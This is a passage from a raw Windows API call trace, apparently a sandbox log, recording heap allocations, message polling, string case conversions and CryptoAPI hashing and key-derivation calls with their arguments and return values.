wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.988] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.989] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.989] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.989] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.989] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.990] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.990] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0198.990] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.991] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0198.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.992] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0198.994] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.995] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.995] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.995] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0198.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.995] CryptHashData (hHash=0xaa57a0, pbData=0x24b1878, dwDataLen=0x3, dwFlags=0x1) returned 1 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0198.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0198.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0198.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.996] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.996] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.996] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.996] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.996] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.996] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.996] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.997] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.997] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.997] CryptDeriveKey (in: hProv=0xad6480, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58e0) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0198.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0198.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.999] HeapFree 